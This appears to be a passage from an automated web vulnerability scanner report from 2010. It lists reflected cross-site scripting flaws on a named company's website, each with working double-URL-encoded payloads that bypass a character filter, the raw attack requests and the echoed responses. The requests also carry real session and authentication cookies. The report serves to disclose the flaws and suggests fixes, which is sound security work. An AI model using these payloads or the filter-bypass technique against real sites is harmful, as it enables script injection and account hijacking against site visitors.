Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:50 GMT
Content-Length: 28919
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/controller/e59ce";alert(1)//e53797cac39","E404") ;
   </script>
...[SNIP]...

1.254. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/autism-speaks-pr [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/autism-speaks-pr

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25a65%2522%253balert%25281%2529%252f%252f0e8ca9ed454 was submitted in the REST URL parameter 1. This input was echoed as 25a65";alert(1)//0e8ca9ed454 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc25a65%2522%253balert%25281%2529%252f%252f0e8ca9ed454/medialib/countries/united-states/press-releases/autism-speaks-pr HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:09 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc25a65";alert(1)//0e8ca9ed454/medialib/countries/united-states/press-releases/autism-speaks-pr","E404") ;
   </script>
...[SNIP]...

1.255. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/autism-speaks-pr [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/autism-speaks-pr

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 438be%2522%253balert%25281%2529%252f%252f3a529a89c2 was submitted in the REST URL parameter 2. This input was echoed as 438be";alert(1)//3a529a89c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib438be%2522%253balert%25281%2529%252f%252f3a529a89c2/countries/united-states/press-releases/autism-speaks-pr HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:15 GMT
Content-Length: 28971
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib438be";alert(1)//3a529a89c2/countries/united-states/press-releases/autism-speaks-pr","E404") ;
   </script>
...[SNIP]...

1.256. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/autism-speaks-pr [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/autism-speaks-pr

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6eb8d%2522%253balert%25281%2529%252f%252fee7f0bf7106 was submitted in the REST URL parameter 3. This input was echoed as 6eb8d";alert(1)//ee7f0bf7106 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/countries6eb8d%2522%253balert%25281%2529%252f%252fee7f0bf7106/united-states/press-releases/autism-speaks-pr HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:21 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/countries6eb8d";alert(1)//ee7f0bf7106/united-states/press-releases/autism-speaks-pr","E404") ;
   </script>
...[SNIP]...

1.257. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/autism-speaks-pr [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/autism-speaks-pr

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bb6f%2522%253balert%25281%2529%252f%252f820040cd6cb was submitted in the REST URL parameter 4. This input was echoed as 7bb6f";alert(1)//820040cd6cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/countries/united-states7bb6f%2522%253balert%25281%2529%252f%252f820040cd6cb/press-releases/autism-speaks-pr HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:25 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/countries/united-states7bb6f";alert(1)//820040cd6cb/press-releases/autism-speaks-pr","E404") ;
   </script>
...[SNIP]...

1.258. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/autism-speaks-pr [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/autism-speaks-pr

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd33a%2522%253balert%25281%2529%252f%252f6f95c1398d2 was submitted in the REST URL parameter 5. This input was echoed as fd33a";alert(1)//6f95c1398d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/countries/united-states/press-releasesfd33a%2522%253balert%25281%2529%252f%252f6f95c1398d2/autism-speaks-pr HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
